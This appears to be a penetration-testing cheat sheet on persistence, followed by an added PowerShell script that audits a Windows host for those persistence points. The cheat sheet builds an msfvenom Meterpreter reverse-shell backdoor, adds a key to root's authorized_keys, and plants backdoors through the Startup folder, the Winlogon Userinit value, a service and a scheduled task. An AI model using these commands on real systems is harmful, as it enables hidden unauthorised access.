🔑Persistence

What if you ask nicely?

Add id_rsa

ssh-keygen -t rsa
cat ~/.ssh/id_rsa.pub | tr -d '\n' | xclip -sel clip

cd /root/.ssh
nano authorized_keys

Windows Meterpreter backdoor

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe > backdoor.exe

Startup folder persistence

# Startup folder location
C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Editing the Winlogon registry key

# When a user logs in Userinit.exe will be executed and then our backdoor.
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, <path-to-backdoor>" /f

Creating a service

powershell_shell
New-Service -Name "<SERVICE_NAME>" -BinaryPathName "<PATH_TO_BINARY>" -Description "<SERVICE_DESCRIPTION>" -StartupType "Automatic"

Scheduled task

powershell_shell
$Action = New-ScheduledTaskAction -Execute 'pwsh.exe' -Argument '-NonInteractive -NoLogo -NoProfile -File "path-to-backdoor"'
$Trigger = New-ScheduledTaskTrigger -Once -At 3am
$Settings = New-ScheduledTaskSettingsSet
$Task = New-ScheduledTask -Action $Action -Trigger $Trigger -Settings $Settings
Register-ScheduledTask -TaskName 'task-name' -InputObject $Task -User 'username' -Password 'pass'
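
To check a host for the Windows techniques above from the defender's side, the following added example (not part of the original page) inspects the Winlogon Userinit value, the Startup folders, auto-start services and scheduled tasks. The function name Test-UserinitValue and the filtering heuristics are assumptions of this example.

```powershell
# Audit of the Windows persistence points listed on this page (added example).
# Assumes an elevated Windows PowerShell session on the host being checked.

function Test-UserinitValue {
    # $true only when the value holds the stock userinit.exe entry and nothing else.
    param([string]$Value)
    $entries = @($Value -split ',' | ForEach-Object { $_.Trim() } | Where-Object { $_ })
    $expected = Join-Path $env:SystemRoot 'System32\userinit.exe'
    return ($entries.Count -eq 1 -and $entries[0] -ieq $expected)
}

# 1. Winlogon Userinit: any entry besides userinit.exe also runs at every logon.
$winlogon = 'HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon'
$userinit = (Get-ItemProperty -Path $winlogon -Name Userinit).Userinit
if (-not (Test-UserinitValue $userinit)) {
    Write-Warning "Unexpected Userinit value: $userinit"
}

# 2. Startup folders (every user profile plus the all-users folder).
$startup = @(
    Get-ChildItem 'C:\Users\*\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' -Force -ErrorAction SilentlyContinue
    Get-ChildItem "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp" -Force -ErrorAction SilentlyContinue
) | Where-Object { $_.Name -ne 'desktop.ini' }
$startup | Select-Object FullName, CreationTime, LastWriteTime

# 3. Auto-start services whose binary is outside the Windows directory.
$winDir = '^"?' + [regex]::Escape($env:SystemRoot + '\')
Get-CimInstance Win32_Service |
    Where-Object { $_.StartMode -eq 'Auto' -and $_.PathName -notmatch $winDir } |
    Select-Object Name, StartName, PathName

# 4. Scheduled tasks outside \Microsoft\ that launch a PowerShell host.
Get-ScheduledTask |
    Where-Object { $_.TaskPath -notlike '\Microsoft\*' } |
    ForEach-Object {
        foreach ($a in $_.Actions) {
            if ($a.Execute -match '(pwsh|powershell)(\.exe)?') {
                [pscustomobject]@{
                    Task      = $_.TaskPath + $_.TaskName
                    Execute   = $a.Execute
                    Arguments = $a.Arguments
                }
            }
        }
    }
```

Sections 2 to 4 list candidates for review rather than confirmed findings; compare the output against a known-good baseline for the host.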
